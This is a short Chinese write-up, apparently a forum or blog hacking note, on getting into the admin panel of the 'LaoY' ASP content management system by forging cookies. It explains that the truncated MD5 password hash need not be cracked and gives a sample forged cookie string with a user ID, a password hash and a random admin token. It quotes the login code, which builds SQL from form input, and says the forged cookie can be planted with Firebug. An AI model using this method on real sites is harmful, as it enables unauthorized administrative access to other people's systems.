老Y的MD5是取32位MD5其中19位,所以根本破解不了的,但是老Y用的是cookie认证,所以根本不需要破解md5,直接伪造cookie进后台即可
UserID=1&UserPass=f7820f85727a6a9cc23&UserName=admin&AdminRndPass=b76a6e1fb7b6e0aafb1bcea1c8608b59
上面的是cookie,但是老Y还有个ranpass值,这个值很坑,没有这个值也是进不了后台的
dim adminname,adminpwd,adminip
if request("action")="adminlogin" then
adminname =CheckStr(trim(Request.form("adminname")))
adminpwd =CheckStr(trim(Request.form("adminpwd")))
adminpwd =Mid(md5("laoy"&adminpwd,32),11,19)
adminRndPassword =md5("l"&"a"&"o"&"yadmin"&RndNumber(1,9999999999),32)
mycode = trim(request.form("code"))
if adminname="" or adminpwd="" then
Call Alert("请输入用户名和密码!",-1)
end if
if mycode<>Session("getcode") then
Call Alert("请输入正确的验证码!",-1)
end if
set rs=server.createobject("ADODB.Recordset")
sql="select * from ["&tbname&"_Admin] where Admin_Name='"&adminname&"' and Admin_Pass='"&adminpwd&"'"
rs.open sql,conn,1,3
If Not rs.Eof Then
Session("YaoContent")=""
Response.Cookies("LaoYAdmin").path=SitePath
Response.Cookies("LaoYAdmin")("UserID")=rs("ID")
Response.Cookies("LaoYAdmin")("UserPass")=rs("Admin_Pass")
Response.Cookies("LaoYAdmin")("UserName")=rs("Admin_Name")
Response.Cookies("LaoYAdmin")("AdminRndPass")=adminRndPassword
'Response.Cookies("LaoYAdmin").Expires=Date+1
rs("Admin_Time") = Now
rs("Admin_IP") = GetIP
rs("AdminRndPass") = adminRndPassword
rs.update
response.Redirect "Index.asp"
else
Call Alert("您输入的用户名或密码不正确!",-1)
end if
rs.close
set rs=nothing
end if
上面代码逻辑是要求先输入管理员的账号密码 校验账号密码对了以后 将生成的一个adminRndPassword MD5值update到数据库中 所以不但要有管理员的pas ,还要有ranpass才能进入后台
有了这两个值就可以直接用firebug伪造一下cookie就进去了